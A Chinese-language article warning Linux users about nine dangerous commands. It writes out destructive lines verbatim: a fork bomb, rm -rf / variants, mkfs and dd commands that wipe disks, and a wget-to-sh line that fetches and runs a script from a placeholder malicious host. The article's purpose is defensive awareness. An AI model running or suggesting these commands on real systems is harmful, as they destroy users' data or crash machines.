9个需要注意的Linux命令和代码
Linux shell/终端命令非常强大,只需一个简单的命令就可以删除文件夹、文件或根文件夹等。
在某些情况下,Linux 甚至不会要求您确认,而是会立即执行命令,从而导致您丢失存储在这些文件和文件夹中的宝贵数据和信息。
人们通常会在 Web 上发布内容,推荐新的 Linux 用户执行这些命令。对于发布内容的人来说,这似乎是个玩笑,但对于另一端的人来说,这可不是什么好笑的事情。
我们收集了一些对您的系统非常有害的 Linux 命令,以帮助您避免它们。请记住,它们确实很危险,甚至可以通过多种方式进行更改,以产生新的命令来造成更大的伤害。
需要注意的重要一点是,其中一些命令只有在 Ubuntu 上以 sudo 为前缀时才是危险的。而在其他 Linux 发行版上,这些给定的命令中的大多数以 root 身份执行都是危险的。
查看应避免执行的 9 个命令和代码。
推荐阅读: 关于 Linux 的 10 个最常见问题
1.Linux fork炸弹命令
:(){ :|: & };:
也称为Fork 炸弹是针对 Linux 系统的拒绝服务攻击。:(){ :|: & };:
是一个 bash 函数。一旦执行,它会重复多次,直到系统死机。
您只能通过重新启动系统来摆脱它。所以在你的 Linux shell 上执行这个命令时要小心。
2. mv 文件夹/dev/null 命令
mv folder/dev/null
是另一个有风险的命令。Dev/null
或者null device
是一个设备文件,丢弃了所有写入的数据,但它报告写入操作已成功执行。它也被称为bit bucked或black hole。
3. rm -rf 命令
rm -rf
命令是在 Linux 操作系统中删除文件夹及其内容的快速方法。如果您不知道如何正确使用它,那么它会对系统造成非常危险。下面列出了与 rm-rf 命令一起使用的最常见的组合和选项:
rm
命令用于删除Linux系统中的文件。rm -f
命令在没有提示的情况下删除文件夹中的只读文件。rm -r
命令递归删除文件夹的内容。rm -d
命令用于删除空目录,但如果目录不为空,它将拒绝删除目录。rm -rf/
命令用于强制删除(即使写保护也删除)根目录和子文件夹中的所有内容。rm -rf*
命令用于强制删除当前目录(您当前工作的目录)和子文件夹中的所有内容。rm -rf.
命令用于强制删除当前文件夹和子文件夹中的所有内容。rm -r.[^.]*
也可以使用该命令。rm -i
命令用于删除文件和文件夹,但在删除之前会出现提示。
4.mkfs 命令
mkfs
如果您不知道它的用途,对于基于 Linux 的系统来说可能是一个危险的命令。在 mkfs 之后写入的任何内容都将被格式化并替换为空白的 Linux 文件系统。
下面提到的所有命令都会格式化硬盘,并且需要管理员权限:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
该命令mkfs.cramfs
将执行与上述相同的操作,但不需要管理员权限即可执行。
5.焦油炸弹
该tar
命令用于将多个文件合并为一个.tar格式的文件(归档文件)。可以使用此命令创建磁带存档 (Tar) 炸弹。
它是一个归档文件,在解压缩后会分解成数千或数百万个名称与现有文件相似的文件,并放入当前目录,而不是放入新目录。
您可以通过在每次收到 tar 文件时定期创建一个新的保护目录,然后在解压缩之前将收到的 tar 文件移动到该目录中来避免成为 tar 炸弹的受害者。
如果 tar 文件确实是一个 tar 炸弹,那么您只需删除新创建的目录即可摆脱它。另一种避免 tar 炸弹爆炸的方法是通过列出 tar 文件的所有内容的选项,让-t
您了解 tar 文件中包含的内容类型。
6.dd命令
该dd
命令用于复制和转换硬盘分区。但是,如果您指定了错误的目的地,结果可能是有害的。
该命令可以是以下任何一项:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
以下命令会将整个主硬盘清零:dd if=/dev/zero of=/dev/had
7. Shell脚本代码
有人可能会通过给您一个 shell 脚本的链接并支持您下载并执行它来使您受害。该脚本可能包含一些恶意或危险的代码。命令的格式可能如下所示:wget http://some_malicious_source -O- | sh
. 将wget
下载脚本,而 sh 下载脚本执行。
8. 恶意源代码
有人给你源代码,让你编译。该代码可能看起来是正常代码,但实际上一些恶意代码伪装在大量源代码中,可能会对您的系统造成危害。为避免成为此类攻击的受害者,请仅从可信赖的来源接受和编译您的源代码。
9.减压弹
您收到了一个压缩文件,系统要求您解压该文件,该文件看起来很小,但可能只有几 KB。事实上,这个小压缩文件包含高度压缩的数据。
文件解压缩后,将提取数百 GB 的数据,这些数据会填满您的硬盘驱动器,从而降低系统性能。为避免这种情况,请始终记住接受来自可靠来源的数据。